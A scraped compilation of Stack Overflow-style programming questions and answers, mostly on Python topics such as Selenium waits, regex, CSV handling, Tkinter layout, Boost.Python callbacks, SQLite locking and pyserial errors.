<html>
<div class="z-page-block-right" style="width:60%;">
<ul class="pageingclass">
<li/>
<li>
<a class="on" href="javascript:void(0)">1</a>
</li>
<li>
<a onclick=" gotoPage('2','2')" href="javascript:void(0)">2</a>
</li>
<li>
<a class=" next " onclick=" gotoPage('2','2')" href="javascript:void(0)"/>
</li>
</ul>
</div>
</html>
Answer: See this element:
<a class="on" href="javascript:void(0)">1</a>
From what I understand this basically means what page are we currently at.
Since we know the page number beforehand, the idea would be to
[wait](http://selenium-python.readthedocs.org/waits.html#explicit-waits) until
the element with the current page number becomes present:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
wait = WebDriverWait(driver, 10)
try:
next_page_elem = self.browser.find_element_by_xpath("//a[text()='%d']" % pageno)
except noSuchElementException:
break
print('page ', pageno)
next_page_elem.click()
# wait for the page to load
wait.until(
EC.presence_of_element_located((By.XPATH, "//a[@class = 'on' and . = '%d']" % pageno))
)
Where `//a[@class = 'on' and . = '%d']` is an XPath expression that would
match `a` element(s) with `class="on"` and the text equal to the page number
that we paste into the expression via string formatting.
|
Implementing Regular expressions in Python
Question: I have a code like this.
<td class="check ABCD" rowspan="2"><center><div class="checkbox {{#if checked}}select{{else}}deselect{{/if}}" id="{{id}}" {{data "tool"}
<td class="check" rowspan="2"><center><div class="checkbox {{#if checked}}select{{else}}deselect{{/if}}" id="{{id}}" {{data "tool"}}>
And I want to extract only the class and ID name in the above code. I have
very little knowledge about using regular expression in python.
How can I extract only the class name & id name(the ones in between "") using
regular expression? or is there any better way to do this?. If yes, please
help me finding it :)
Thanks in advance.
Answer: Since you asked for a Regex solution in Python, you'll get one:
import re
p = re.compile(ur'^.+?class="([^"]+)".+id="([^"]+)".+?$', re.MULTILINE)
test_str = u"<td class=\"check ABCD\" rowspan=\"2\"><center><div class=\"checkbox {{#if checked}}select{{else}}deselect{{/if}}\" id=\"{{id}}\" {{data \"tool\"}\n<td class=\"check\" rowspan=\"2\"><center><div class=\"checkbox {{#if checked}}select{{else}}deselect{{/if}}\" id=\"{{id}}\" {{data \"tool\"}}>"
re.findall(p, test_str)
See live example over here: <https://regex101.com/r/cG8dC5/1>
Nevertheless, as some other users already noted. Regex [isn't ideal for
parsing](http://stackoverflow.com/questions/1732348/regex-match-open-tags-
except-xhtml-self-contained-tags/1732454#1732454 "isn't ideal for parsing")
(x)HTML. Better have a look at: <https://pypi.python.org/pypi/beautifulsoup4>
|
calculating the total of row 4 in excel csv file python
Question: I cant find the total of row 4 in a csv file my code is to enter a code which
is searched in a csv file which is then written to a new csv file in order for
it to be printed as a receipt my problem is in the last few lines this is my
code until know:
import csv
try_again= "Yes"
myfile2=open("reciept.csv","a+")
while try_again =="Yes":
found= "no"
myfile=open("stock_file.csv","r+")
gtin_8= input("enter the gtin-8")
quantity= input("enter quantity wanted")
reader=csv.reader(myfile)
for row in reader:
if gtin_8 == row[0]:
description= row[1]
unit_price= row[2]
product_price=((float(unit_price)*(float(quantity))))
product_price1= str(product_price)
new_record=(gtin_8+","+description+","+quantity+","+unit_price+","+product_price1)
myfile2.write(str(new_record))
myfile2.write("\n")
found="yes"
if found=="no":
nf="not found"
new_record1=(gtin_8+","+nf)
myfile2.write(new_record1)
myfile2.write("\n")
try_again=input("do you want to try again")
try_again=try_again.title()
myfile2.close()
myfile3=open("reciept.csv","r+")
reader1=csv.reader(myfile3)
total_cost=0
for row in reader1:
print (row)
total = sum(float(r[4]) for r in csv.reader(myfile3))
print (total_cost)
Answer: You have a nested loop at the end (for loop and a list comprehension inside
it) which is why it isn't working like you want it to.
You also define a variable named `total_cost` as `0` and never do anything
with it and then just print it.
No nested loop is needed so this should work:
total_cost = 0.0
for row in reader1:
if row[1] == "not found"
total_cost += float(row[4])
Other pointers:
There is a
[`csv.writer`](https://docs.python.org/3/library/csv.html#csv.writer) too
which is safer to use than just string concatenation and writing to a file.
|
Python how remove the name of the parent object from function names
Question: I have a .py file with my own functions, which I run on ipython on several
machines. The problem is that in some platforms I can call functions like
sin(), size(), plot() without the prefix of the parent class name and on other
platforms I need to write the full path: numpy.sin(), ndarray.size(),
pyplot.plot(). 1) What are the rules that determine when the full path is used
and when I can use the short form? 2) Can I manually set a function to its
short form?
Answer: Take a look at the definition of the `import` statement. There are two forms:
import math
math.sin(1)
Second form is:
from math import sin
sin(1)
Note that since modules are also objects, you can also store `math.sin` in the
first case in a local variable:
import math
sin = math.sin
sin(1)
|
selenium TimeoutException: Message: python
Question: I have the following code, and trying to connect to itunesconnect using
selenium
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
driver = webdriver.Firefox()
driver.get("https://itunesconnect.apple.com/WebObjects/iTunesConnect.woa")
element = WebDriverWait(driver, 20).until(lambda driver : driver.find_element_by_id('appleId'))
But i was getting `*** TimeoutException: Message:` as below
*** TimeoutException: Message:
Stacktrace:
at FirefoxDriver.prototype.findElementInternal_ (file:///var/folders/x1/1bwt313j0qvgdh5pfzpbpvcw0000gn/T/tmp27vpUf/extensions/[email protected]/components/driver-component.js:10770)
at FirefoxDriver.prototype.findElement (file:///var/folders/x1/1bwt313j0qvgdh5pfzpbpvcw0000gn/T/tmp27vpUf/extensions/[email protected]/components/driver-component.js:10779)
at DelayedCommand.prototype.executeInternal_/h (file:///var/folders/x1/1bwt313j0qvgdh5pfzpbpvcw0000gn/T/tmp27vpUf/extensions/[email protected]/components/command-processor.js:12661)
at DelayedCommand.prototype.executeInternal_ (file:///var/folders/x1/1bwt313j0qvgdh5pfzpbpvcw0000gn/T/tmp27vpUf/extensions/[email protected]/components/command-processor.js:12666)
at DelayedCommand.prototype.execute/< (file:///var/folders/x1/1bwt313j0qvgdh5pfzpbpvcw0000gn/T/tmp27vpUf/extensions/[email protected]/components/command-processor.js:12608)
Any idea of what's going wrong ?
Answer: The element is inside `iframe`, you need to switch to it first
driver.switch_to_frame('authFrame') # by frame id, can also be name or WebElement
element = WebDriverWait(driver, 20).until(lambda driver : driver.find_element_by_id('appleId'))
And to switch back
driver.switch_to_default_content()
|
String alignment in Tkinter
Question: I want a message box in Python which shows the concatenated string text. I
want the text is left aligned but it doesn't. I tried `ljust()` and `{:<14}`
etc. But it still not aligned.
It seems like this:
[](http://i.stack.imgur.com/hqBRg.png)
The code piece is below,
for todo_item in resp.json()['SectorList']:
sector_id +='Sector Id: {:<14}'.format(todo_item['SectorId']) + '\n'
sector_name += 'Sector Name: {:<40}'.format(todo_item['SectorName']) + '\n'
After the loop I add those texts into my message box.
label_id = tkinter.Label(f, anchor = tkinter.W, text = sector_id)
label_name= tkinter.Label(f,anchor = tkinter.W, text = sector_name)
label_id.grid(row= 2, column = 1, sticky = tkinter.W)
label_name.grid(row= 2, column = 2, sticky = tkinter.W)
Sector id part is fine but sector name is not left aligned. Any idea?
Answer: Relying on fonts for alignment is bad practice; as mentioned it only works
with monospaces fonts, but do you _really_ want to use monospaces fonts in
your entire application _only_ for alignment? I sure don't. And what if you
want to change a `Label` to a `Input` or something else later on? Do we now
have to add new `Label`s just for alignment?
So while changing to a monospaced font "works", a (much) better way would be
to use the tools Tk provides us.
For example, you can set the `Label()` in the first column to a fixed width:
import tkinter
# Just some random strings of different sizes from my dictionary
names = ['Algol', 'American', 'Americanises', 'Americanising', 'Americanism',
'Argentine', 'Argentinian', 'Ariz', 'Arizona', 'Armstrong']
root = tkinter.Tk()
tkinter.Label(root, text='Lists:', anchor=tkinter.W).grid(row=0, column=0, sticky=tkinter.W)
for i in range(0, 10):
label_id = tkinter.Label(root, width=30, anchor=tkinter.W, text='Sector %s' % i)
label_name = tkinter.Label(root, anchor=tkinter.W, text=names[i])
label_id.grid(row=i+1, column=0, sticky=tkinter.W)
label_name.grid(row=i+1, column=1, sticky=tkinter.W)
root.mainloop()
There are more ways to do this, though. For example by setting a width using
`columnconfigure`:
import tkinter
# Just some random strings of different sizes from my dictionary
names = ['Algol', 'American', 'Americanises', 'Americanising', 'Americanism',
'Argentine', 'Argentinian', 'Ariz', 'Arizona', 'Armstrong']
root = tkinter.Tk()
root.columnconfigure(0, minsize=150)
tkinter.Label(root, text='Lists:', anchor=tkinter.W).grid(row=0, column=0, sticky=tkinter.W)
for i in range(0, 10):
label_id = tkinter.Label(root, anchor=tkinter.W, text='Sector %s' % i)
label_name = tkinter.Label(root, anchor=tkinter.W, text=names[i])
label_id.grid(row=i+1, column=0, sticky=tkinter.W)
label_name.grid(row=i+1, column=1, sticky=tkinter.W)
root.mainloop()
The advantage of using `columnconfigure()` is that the minimum width is
independent of the column's contents. So if you change the `Label()` to
something else later, the layout should still work, and it's probably a bit
more obvious that you explicitly want to set a width for this column.
|
How to validated a boost::python::object is a function signature with an argument
Question: How to validated a boost::python::object argument is a python function
signature with an argument?
void subscribe_py(boost::python::object callback){
//check callback is a function signature
}
Answer: Boost.Python does not provide a higher-level type to help perform
introspection. However, one can use the Python C-API's
[`PyCallable_Check()`](https://docs.python.org/2/c-api/object.html#c.PyCallable_Check)
to check if a Python object is callable, and then use a Python introspection
module, such as [`inspect`](https://docs.python.org/2/library/inspect.html),
to determine the callable object's signature. Boost.Python's interoperability
between C++ and the Python makes this fairly seamless to use Python modules.
Here is an auxiliary function, `require_arity(fn, n)` that requires the
expression `fn(a_0, a_1, ... a_n)` to be valid:
/// @brief Given a Python object `fn` and an arity of `n`, requires
/// that the expression `fn(a_0, a_1, ..., a_2` to be valid.
/// Raise TypeError if `fn` is not callable and `ValueError`
/// if `fn` is callable, but has the wrong arity.
void require_arity(
std::string name,
boost::python::object fn,
std::size_t arity)
{
namespace python = boost::python;
std::stringstream error_msg;
error_msg << name << "() must take exactly " << arity << " arguments";
// Throw if the callback is not callable.
if (!PyCallable_Check(fn.ptr()))
{
PyErr_SetString(PyExc_TypeError, error_msg.str().c_str());
python::throw_error_already_set();
}
// Use the inspect module to extract the arg spec.
// >>> import inspect
auto inspect = python::import("inspect");
// >>> args, varargs, keywords, defaults = inspect.getargspec(fn)
auto arg_spec = inspect.attr("getargspec")(fn);
python::object args = arg_spec[0];
python::object varargs = arg_spec[1];
python::object defaults = arg_spec[3];
// Calculate the number of required arguments.
auto args_count = args ? python::len(args) : 0;
auto defaults_count = defaults ? python::len(defaults) : 0;
// If the function is a bound method or a class method, then the
// first argument (`self` or `cls`) will be implicitly provided.
// >>> has_self = inspect.ismethod(fn) and fn.__self__ is not None
if (static_cast<bool>(inspect.attr("ismethod")(fn))
&& fn.attr("__self__"))
{
--args_count;
}
// Require at least one argument. The function should support
// any of the following specs:
// >>> fn(a1)
// >>> fn(a1, a2=42)
// >>> fn(a1=42)
// >>> fn(*args)
auto required_count = args_count - defaults_count;
if (!( (required_count == 1) // fn(a1), fn(a1, a2=42)
|| (args_count > 0 && required_count == 0) // fn(a1=42)
|| (varargs) // fn(*args)
))
{
PyErr_SetString(PyExc_ValueError, error_msg.str().c_str());
python::throw_error_already_set();
}
}
And its usage would be:
void subscribe_py(boost::python::object callback)
{
require_arity("callback", callback, 1); // callback(a1) is valid
...
}
* * *
Here is a complete example [demonstrating](http://coliru.stacked-
crooked.com/a/f8d5f23154e3e745) the usage:
#include <boost/python.hpp>
#include <sstream>
/// @brief Given a Python object `fn` and an arity of `n`, requires
/// that the expression `fn(a_0, a_1, ..., a_2` to be valid.
/// Raise TypeError if `fn` is not callable and `ValueError`
/// if `fn` is callable, but has the wrong arity.
void require_arity(
std::string name,
boost::python::object fn,
std::size_t arity)
{
namespace python = boost::python;
std::stringstream error_msg;
error_msg << name << "() must take exactly " << arity << " arguments";
// Throw if the callback is not callable.
if (!PyCallable_Check(fn.ptr()))
{
PyErr_SetString(PyExc_TypeError, error_msg.str().c_str());
python::throw_error_already_set();
}
// Use the inspect module to extract the arg spec.
// >>> import inspect
auto inspect = python::import("inspect");
// >>> args, varargs, keywords, defaults = inspect.getargspec(fn)
auto arg_spec = inspect.attr("getargspec")(fn);
python::object args = arg_spec[0];
python::object varargs = arg_spec[1];
python::object defaults = arg_spec[3];
// Calculate the number of required arguments.
auto args_count = args ? python::len(args) : 0;
auto defaults_count = defaults ? python::len(defaults) : 0;
// If the function is a bound method or a class method, then the
// first argument (`self` or `cls`) will be implicitly provided.
// >>> has_self = inspect.ismethod(fn) and fn.__self__ is not None
if (static_cast<bool>(inspect.attr("ismethod")(fn))
&& fn.attr("__self__"))
{
--args_count;
}
// Require at least one argument. The function should support
// any of the following specs:
// >>> fn(a1)
// >>> fn(a1, a2=42)
// >>> fn(a1=42)
// >>> fn(*args)
auto required_count = args_count - defaults_count;
if (!( (required_count == 1) // fn(a1), fn(a1, a2=42)
|| (args_count > 0 && required_count == 0) // fn(a1=42)
|| (varargs) // fn(*args)
))
{
PyErr_SetString(PyExc_ValueError, error_msg.str().c_str());
python::throw_error_already_set();
}
}
void perform(
boost::python::object callback,
boost::python::object arg1)
{
require_arity("callback", callback, 1);
callback(arg1);
}
BOOST_PYTHON_MODULE(example)
{
namespace python = boost::python;
python::def("perform", &perform);
}
Interactive usage:
>>> import example
>>> def test(fn, a1, expect=None):
... try:
... example.perform(fn, a1)
... assert(expect is None)
... except Exception as e:
... assert(isinstance(e, expect))
...
>>> test(lambda x: 42, None)
>>> test(lambda x, y=2: 42, None)
>>> test(lambda x=1, y=2: 42, None)
>>> test(lambda *args: None, None)
>>> test(lambda: 42, None, ValueError)
>>> test(lambda x, y: 42, None, ValueError)
>>>
>>> class Mock:
... def method_no_arg(self): pass
... def method_with_arg(self, x): pass
... def method_default_arg(self, x=1): pass
... @classmethod
... def cls_no_arg(cls): pass
... @classmethod
... def cls_with_arg(cls, x): pass
... @classmethod
... def cls_with_default_arg(cls, x=1): pass
...
>>> mock = Mock()
>>> test(Mock.method_no_arg, mock)
>>> test(mock.method_no_arg, mock, ValueError)
>>> test(Mock.method_with_arg, mock, ValueError)
>>> test(mock.method_with_arg, mock)
>>> test(Mock.method_default_arg, mock)
>>> test(mock.method_default_arg, mock)
>>> test(Mock.cls_no_arg, mock, ValueError)
>>> test(mock.cls_no_arg, mock, ValueError)
>>> test(Mock.cls_with_arg, mock)
>>> test(mock.cls_with_arg, mock)
>>> test(Mock.cls_with_default_arg, mock)
>>> test(mock.cls_with_default_arg, mock)
Strict checking of function types can be argued as being non-Pythonic and can
become complicated due to the various types of callables (bound-method,
unbound method, classmethod, function, etc). Before applying strict type
checking, it may be worth assessing if strict type checking is required, or if
alternatives checks, such as [Abstract Base
Classes](https://www.python.org/dev/peps/pep-3119/), would be sufficient. For
instance, if the `callback` functor will be invoked within a Python thread,
then it may be worth not performing type checking, and allow the Python
exception to be raised when invoked. On the other hand, if the `callback`
functor will be invoked from within a non-Python thread, then type checking
within the initiating function can allow one to throw an exception within the
calling Python thread.
|
SQLite database gets locked by SELECT clause
Question: I have a python script which creates a database and then enters an infinite
loop which runs once per second quering the database with some selects.
At the same time I connect to the database with a sqlite cli and try to make
an update but I get a database is locked error.
Here the (anonimized) code of the script:
import sqlite3
import time
con = sqlite3.connect(r'path\to\database.sqlite')
con.execute('DROP TABLE IF EXISTS blah;')
con.execute('CREATE TABLE blah;')
con.execute('INSERT INTO blah;')
con.commit()
while True:
result = con.execute('SELECT blah')
print(result.fetchone()[0])
time.sleep(1)
Answer: Python's `sqlite3` module tries to be clever and [manages transactions for
you](https://docs.python.org/2/library/sqlite3.html#sqlite3-controlling-
transactions).
To ensure that you can access the database from other threads/processes,
disable that (set `isolation_level` to `None`), and use explicit transactions,
when needed. Alternatively, call `con.commit()` whenever you are finished.
|
wx.SetTextForeground doesn't set DC color properly in wxPython
Question: I have the following code and I'm trying to change the text color of DC. I
have searched the internet and found that SetTextForeground should be used for
this, but somehow I'm unable to make it work.
import wx
class GUI():
def __init__(self):
self.InitUI()
def InitUI(self):
self.window = wx.Frame(None, wx.ID_ANY, "Example Title")
textList = ['text1', 'text2']
for i in range(len(textList)):
bmp = wx.Image('images/step_background.png').Rescale(160, 40).ConvertToBitmap()
bmp = self.drawTextOverBitmap(bmp, textList[i])
control = wx.StaticBitmap(self.window, -1, bmp, (0, 30*i+20), size=(160,30))
self.window.Show()
def drawTextOverBitmap(self, bitmap, text='', color=(0, 0, 0)):
dc = wx.MemoryDC(bitmap)
dc.SetTextForeground(color)
w,h = dc.GetSize()
tw, th = dc.GetTextExtent(text)
dc.DrawText(text, (w - tw) / 2, (h - th) / 2) #display text in center
return bitmap
if __name__ == '__main__':
app = wx.App()
gui = GUI()
app.MainLoop()
Do you have any ideas what am I doing wrong? I would be grateful for any idea.
Thank you
Answer: You are right, transparency is the issue here. Tried your code on a non-
transparent image and it works fine displaying the color you set.
Quoting from the [official
docs](http://docs.wxwidgets.org/trunk/classwx_d_c.html):
> In general wxDC methods don't support alpha transparency and the alpha
> component of wxColour is simply ignored and you need to use
> wxGraphicsContext for full transparency support.
So try creating a graphics context like:
dc = wx.MemoryDC(bmp)
gc = wx.GraphicsContext.Create(dc)
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
gc.SetFont(font, "Red")
w,h = dc.GetSize()
tw, th = dc.GetTextExtent(textList[i])
gc.DrawText(textList[i], (w - tw) / 2, (h - th) / 2)
|
How to set relative path to executive script
Question: I want to set relative path to folder with my executive script that will works
from any machine without hardcoding absolute path to file. So far I have
following:
import os
path_to_folder = os.path.realpath('.')
When I run my script from `PyCharm` calling `print(path_to_folder)` return
correct path
`C:\Users\Me\Desktop\Project\Script\`
But if I try to call it from `cmd` like `python3.4
C:\Users\Me\Desktop\Project\Script\my_script.py` I get just
`C:\Users\Me\`
What is the more reliable way to set relative path?
Answer: I used to use [Pathlib](https://docs.python.org/3/library/pathlib.html)
# get sibling file
sib = Path(__file__).with_name(same_level_file)
# get parent
par = Path(__file__).parent
# file in sibling parent
sib2 = Path(__file__).parent.with_name(parent_folder).joinpath(file2)
|
python-serial OSError: [Errno 11] Resource temporarily unavailable
Question: I am using Arduino Nano to serial communicated with ODROID (single-board
computer installed Ubuntu 14.04). The Arduino code:
void setup() {
Serial.begin(9600); // set the baud rate
Serial.println("Ready"); // print "Ready" once
}
void loop() {
char inByte = ' ';
if(Serial.available()){ // only send data back if data has been sent
char inByte = Serial.read(); // read the incoming data
Serial.println(inByte);
}
delay(100); // delay for 1/10 of a second
}
The Python code in ODROID:
#!/usr/bin/env python
from time import sleep
import serial
ser = serial.Serial('/dev/LIDAR', 9600, timeout=1) # Establish the connection on a specific port
sleep(1)
print "Arduino is initialized"
counter = 32 # Below 32 everything in ASCII is gibberish
while True:
if (ser.inWaiting()>0):
counter +=1
ser.write(str(chr(counter))) # Convert the decimal number to ASCII then send it to the Arduino
print ser.readline() # Read the newest output from the Arduino
sleep(.1) # Delay for one tenth of a second
if counter == 255:
counter = 32
ser.close
**Traceback(most recent last):**
File "./serial_test1.py", line 16, in <module>
print ser.readline() # Read the newest output from the Arduino
File "/usr/lib/python2.7/dis-package/serial/serialposix.py", line 43, in read
buf = os.read(self.fd, size-len(read))
OSError: [Errno 11]Resource temporarily unavailable
Then I had this issue after print some values, I know this problem maybe no
data in available at current time. But how can I figure out this issue. Thanks
for your help.
Answer: I don't know if this will work for ODROID, but I found a post about [similar
problem with Raspberry
PI](https://www.raspberrypi.org/forums/viewtopic.php?t=42931&p=346024). In
that post one of the answers [redirected to this
link](http://www.hobbytronics.co.uk/raspberry-pi-serial-port)
There it says the problems is caused by Raspberry Pi serial port, which is
used by default to use the system console which conflicts when you try to use
it for your own purposes
To disable the serial por for console you must edit the file `/etc/inittab`
and comment the line `T0:23:respawn:/sbin/getty -L ttyAMA0 115200 vt100` (You
comment it with a `#` at the begining of the line, like in python). You must
reboot the ODROID and it should work
I suggest you to read the answer I linked cause it explains a bit more about
how can you substitute the serial port to access the command line (It suggests
using ssh) and another thing is that Raspberry PI (And assume ODROID works
similar) sends at boot time a message through serial port that will be
received by the Arduino. You can remove that message and it's explained there
Hope this helps you
|
Subsets and Splits